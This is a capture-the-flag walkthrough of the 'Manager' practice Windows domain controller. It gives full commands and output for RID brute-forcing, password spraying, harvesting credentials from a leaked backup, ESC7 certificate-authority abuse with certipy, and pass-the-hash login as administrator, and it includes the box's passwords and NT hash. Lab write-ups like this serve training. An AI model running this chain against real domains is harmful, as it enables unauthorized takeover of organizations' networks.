Manager
Machine Information
| Name | OS | IP | Difficulty |
|---|---|---|---|
| Manager | Windows | 10.10.11.236 | Medium |
Background
This box starts off with null/guest access to the domain where RIDs can be brute forced. From there, weak credentials lead to the improper storage of domain credentials. Those credentials can be abused with Active Directory Certificate Services (ADCS) to compromise the domain.
Methodology
First, let's start off with a nmap scan to see what we are up against.
Nmap Scan
$ sudo nmap -Pn -n -p- -A -T4 -v 10.10.11.236 -oN nmap.txt
<SNIP>
Nmap scan report for 10.10.11.236
Host is up (0.055s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-11 01:22:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-11T01:23:51+00:00; +6h59m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-11T00:43:27
| Not valid after: 2054-10-11T00:43:27
| MD5: ea1d:1f81:1365:bdec:8037:f2d4:05c5:9bde
|_SHA-1: c5c9:8022:854b:b4fe:54c0:f33c:62cd:003c:1a1d:78e4
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-11T01:23:51+00:00; +6h59m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
|_SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
<SNIP>
Host script results:
|_clock-skew: mean: 6h59m37s, deviation: 0s, median: 6h59m37s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-11T01:23:06
|_ start_date: N/A
<SNIP>
With the output from Nmap we see that we are working with a lot of different ports. There are standard ports open for Active Directory (88, 389, 464, 593, 636, 3268, 3269), WinRM for remote management (5985), stanard ports for a Windows operating system (135, 139, 445), Microsoft SQL Server - MSSQL (1433), and lastly a website on port 80 with IIS. We can also see the domain name of manager.htb, and the host name of DC01.
Also near the end of the nmap output we can see that there is clock skew of 7 hours, we are going to fix this now so it wont be a problem later.
Website
We can try for some quick wins by browsing the website, enumerating for subdomains, searching for files and directories with a tool like ffuf, but there will be no hits.
SMB & RID Bruteforce
We can see if we can enumerate any shares as a guest
$ smbclient --no-pass --list //10.10.11.236
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Unfortunately there are no shares we can access but since we can enumerate shares as a guest we can brutefroce all the users from their RID.
$ nxc smb 10.10.11.236 -u " " -p "" --rid-brute
<SNIP>
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
<SNIP>
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
We now have a list of usernames that we can try to get a password for.
We can first try using the username as the password before trying any wordlists as this is a common credential issue.
$ nxc smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\jinWoo:jinWoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
With that we now have the username:password for operator:operator.
Operator
We check again for any shares we can now enumerate using our credentials, but there are still none. What we can also try is using Bloodhound but there are no privilage escalation paths found, only that Raven can login remotely.
There is still one thing we can try that we found earlier, and that is the SQL Server. We can use the Impacket script mssqlclient
$ mssqlclient.py -windows-auth manager.htb/operator@10.10.11.236
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
Now that we have a foothold through the SQL server, we can try a handfull of commands, like xp_cmdshell or xp_dirtree which are builtin to mssqlclient.
We find out that we do not have permissions to execute commands, but we can browse for files
SQL (MANAGER\Operator guest@master)> xp_dirtree
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
Let us start first by enumerating the website
SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub
subdirectory depth file
------------ ----- ----
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
SQL (MANAGER\Operator guest@master)> xp_dirtree c:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
There is a backup of the whole website, website-backup-27-07-23-old.zip. Downloading and extracting the zip file reveals another set of Active Directory credentials for raven:R4v3nBe5tD3veloP3r!123 in the .old-conf.xml.
$ wget http://10.10.11.236/website-backup-27-07-23-old.zip
<SNIP>
$ unzip website-backup-27-07-23-old.zip
<SNIP>
$ ls -la
drwxrwxr-x 5 rro rro 4096 Oct 18 12:33 .
drwxr-xr-x 9 rro rro 4096 Oct 18 12:33 ..
-rw-rw-r-- 1 rro rro 5386 Jul 27 2023 about.html
-rw-rw-r-- 1 rro rro 5317 Jul 27 2023 contact.html
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 css
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 images
-rw-rw-r-- 1 rro rro 18203 Jul 27 2023 index.html
drwxrwxr-x 2 rro rro 4096 Oct 18 12:33 js
-rw-rw-r-- 1 rro rro 698 Jul 27 2023 .old-conf.xml
-rw-rw-r-- 1 rro rro 7900 Jul 27 2023 service.html
$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
Raven
With Ravens credentials, knowing we can login remotely, and WinRM is open, we can use evil-winrm to gain access to the box again.
$ evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>
We can submit the user flag!
Another thing we can try with the Raven account that we did not do with the Operator account is certipy to see if we can exploit ADCS.
$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
We can see there is ESC7 is exploitable. From the Certipy Github Readme, we can read more abou it.
ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. There are no public techniques that can abuse the Manage Certificates access right for domain privilege escalation, but it can be used it to issue or deny pending certificate requests.
It also goes into detail as to which commands to run.
First we will want to add Raven to the ManageCertificates access rights.
certipy ca -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven -ca manager-DC01-CA
$ certipy ca -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven -ca manager-DC01-CA
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Running the prior command where we found the vulnerability from again will show Raven with ManageCertificates access.
$ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
<SNIP>
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
We can now request a certifiace from the SubCA tempalte.
certipy req -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn administrator@manager.htb
$ certipy req -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 28
Would you like to save the private key? (y/N) y
[*] Saved private key to 28.key
[-] Failed to request certificate
Keep track of the request ID as it will be used in the next couple of commands.
From here we can issue the certificate request.
certipy ca -ca manager-DC01-CA -issue-request 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
$ certipy ca -ca manager-DC01-CA -issue-request 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Once the certificate has been issued, we can retrieve the certifiace with the following.
certipy req -ca manager-DC01-CA -retrieve 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
$ certipy req -ca manager-DC01-CA -retrieve 28 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 28
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '28.key'
[*] Saved certificate and private key to 'administrator.pfx'
Administrator
Last step is to use certipy one more time to retrieve the NT hash for the administrator account.
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
We now have a hash for administrator : ae5064c2f62317332c88629e025924ef. Using evil-winrm again, we can login as administrator by passing the hash.
$ evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Congrats! We can now submit the root (administrator) flag!